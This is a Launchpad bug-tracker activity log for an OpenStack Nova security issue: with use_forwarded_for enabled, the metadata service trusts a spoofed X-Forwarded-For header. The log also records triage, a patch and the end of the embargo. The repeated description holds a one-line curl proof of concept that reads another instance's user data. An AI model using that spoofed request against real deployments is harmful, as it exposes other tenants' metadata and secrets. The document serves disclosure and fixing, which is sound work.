2016-03-30 16:03:17 |
Rob Crittenden |
bug |
|
|
added bug |
2016-03-30 17:05:40 |
Tristan Cacqueray |
bug task added |
|
ossa |
|
2016-03-30 17:05:53 |
Tristan Cacqueray |
description |
The nova metadata service uses the remote address to determine which metadata to retrieve. In order to work behind a proxy there is an option use_forwarded_for which will use the X-Forwarded-For header to determine the remote IP.
If this option is set, then anyone who can access the metadata port can request metadata for any instance if they know its IP.
The user data is also exposed.
$ echo 123456 > /tmp/data
$ openstack server create --image CentOS7 --flavor fedora --user-data /tmp/data test
<wait>
$ curl -H 'X-Forwarded-For: 10.0.0.7' http://localhost:8775/latest/user-data/
123456
At a minimum, this side effect isn't documented anywhere I could find. |
This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments.
--
The nova metadata service uses the remote address to determine which metadata to retrieve. In order to work behind a proxy there is an option use_forwarded_for which will use the X-Forwarded-For header to determine the remote IP.
If this option is set, then anyone who can access the metadata port can request metadata for any instance if they know its IP.
The user data is also exposed.
$ echo 123456 > /tmp/data
$ openstack server create --image CentOS7 --flavor fedora --user-data /tmp/data test
<wait>
$ curl -H 'X-Forwarded-For: 10.0.0.7' http://localhost:8775/latest/user-data/
123456
At a minimum, this side effect isn't documented anywhere I could find. |
|
2016-03-30 17:06:01 |
Tristan Cacqueray |
bug |
|
|
added subscriber Nova Core security contacts |
2016-04-04 15:05:31 |
Tristan Cacqueray |
ossa: status |
New |
Incomplete |
|
2016-06-29 01:52:53 |
Tony Breeds |
bug |
|
|
added subscriber Jamie Lennox |
2016-06-29 06:43:14 |
Tony Breeds |
attachment added |
|
0001-metadata-Limit-servers-that-can-use-X-Forwarded-For.patch https://bugs.launchpad.net/nova/+bug/1563954/+attachment/4692038/+files/0001-metadata-Limit-servers-that-can-use-X-Forwarded-For.patch |
|
2016-06-29 06:54:05 |
Tony Breeds |
nova: importance |
Undecided |
High |
|
2016-06-29 06:54:05 |
Tony Breeds |
nova: status |
New |
Confirmed |
|
2016-06-29 06:54:05 |
Tony Breeds |
nova: assignee |
|
Tony Breeds (o-tony) |
|
2016-06-29 14:03:34 |
Jeremy Stanley |
bug |
|
|
added subscriber OSSG CoreSec |
2016-07-11 16:12:42 |
Tristan Cacqueray |
ossa: status |
Incomplete |
Opinion |
|
2016-07-11 16:44:14 |
Travis McPeak |
bug task added |
|
ossn |
|
2016-08-17 20:31:36 |
Travis McPeak |
ossn: assignee |
|
Travis McPeak (travis-mcpeak) |
|
2016-08-19 16:24:55 |
Travis McPeak |
ossn: assignee |
Travis McPeak (travis-mcpeak) |
|
|
2016-08-19 16:25:06 |
Travis McPeak |
ossn: assignee |
|
Robert Clark (robert-clark) |
|
2016-09-23 13:29:45 |
Robert Clark |
ossn: status |
New |
Confirmed |
|
2016-09-23 13:29:49 |
Robert Clark |
ossn: importance |
Undecided |
High |
|
2016-12-15 16:55:41 |
Luke Hinds |
ossn: status |
Confirmed |
In Progress |
|
2016-12-19 09:28:35 |
Luke Hinds |
ossn: status |
In Progress |
Fix Released |
|
2016-12-19 09:28:48 |
Luke Hinds |
information type |
Private Security |
Public Security |
|
2016-12-19 15:07:15 |
Fungi Three |
information type |
Public Security |
Public |
|
2016-12-19 15:07:26 |
Fungi Three |
tags |
|
security |
|
2017-01-20 01:03:45 |
Tristan Cacqueray |
description |
This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments.
--
The nova metadata service uses the remote address to determine which metadata to retrieve. In order to work behind a proxy there is an option use_forwarded_for which will use the X-Forwarded-For header to determine the remote IP.
If this option is set, then anyone who can access the metadata port can request metadata for any instance if they know its IP.
The user data is also exposed.
$ echo 123456 > /tmp/data
$ openstack server create --image CentOS7 --flavor fedora --user-data /tmp/data test
<wait>
$ curl -H 'X-Forwarded-For: 10.0.0.7' http://localhost:8775/latest/user-data/
123456
At a minimum, this side effect isn't documented anywhere I could find. |
The nova metadata service uses the remote address to determine which metadata to retrieve. In order to work behind a proxy there is an option use_forwarded_for which will use the X-Forwarded-For header to determine the remote IP.
If this option is set, then anyone who can access the metadata port can request metadata for any instance if they know its IP.
The user data is also exposed.
$ echo 123456 > /tmp/data
$ openstack server create --image CentOS7 --flavor fedora --user-data /tmp/data test
<wait>
$ curl -H 'X-Forwarded-For: 10.0.0.7' http://localhost:8775/latest/user-data/
123456
At a minimum, this side effect isn't documented anywhere I could find. |
|
2017-06-23 16:29:35 |
Sean Dague |
nova: assignee |
Tony Breeds (o-tony) |
|
|
2019-12-08 08:17:37 |
Jamie Lennox |
removed subscriber Jamie Lennox |
|
|
|